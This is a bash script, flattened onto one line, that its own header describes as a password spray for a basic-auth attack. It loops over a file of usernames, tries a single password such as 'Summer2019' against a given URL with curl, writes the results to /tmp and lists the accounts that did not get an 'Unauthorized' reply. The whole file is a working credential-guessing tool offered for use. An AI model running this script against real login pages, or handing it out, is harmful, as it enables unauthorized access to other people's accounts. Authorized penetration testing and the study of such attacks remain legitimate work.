#!/bin/bash ######################################################################################### # Here is a simple password spray for a basic auth attack # # # # Usage thisscript.sh pathof_usernames.txt password_to_try URL # # I.e. ./thisscript.sh /tmp/usernames.txt Summer2019 https://website.com/login.php # ######################################################################################### script=$(basename -- "$0") if [[ -z $1 || -z $2 || -z $3 ]] then clear && echo "You failed to execute this script correctly: Usage thisscript.sh pathof_usernames.txt password_to_try URL I.e $(pwd)/${script} /tmp/usernames.txt Summer2019 https://website.com/login.php" exit 9 fi cat /dev/null > /tmp/password_spray_results.txt INPUT=$1 OLDIFS=$IFS IFS="," [ ! -f $INPUT ] && { echo "$INPUT file not found"; exit 99; } while read useraccount do curl -s -vvvv -IL --user ${useraccount}:${2} ${3} -o .curl 2>.curl2 size=$(stat --printf="%s" .curl) code=$(cat .curl | grep HTTP | tail -1) echo "$useraccount,$size,$code" >>/tmp/password_spray_results.txt done < $INPUT IFS=$OLDIFS rm .curl .curl2 echo "The below user accounts have a password of ${2}" cat /tmp/password_spray_results.txt | grep -v Unauthorized | cut -d',' -f1 echo "See results in /tmp/password_spray_results.txt file" exit 0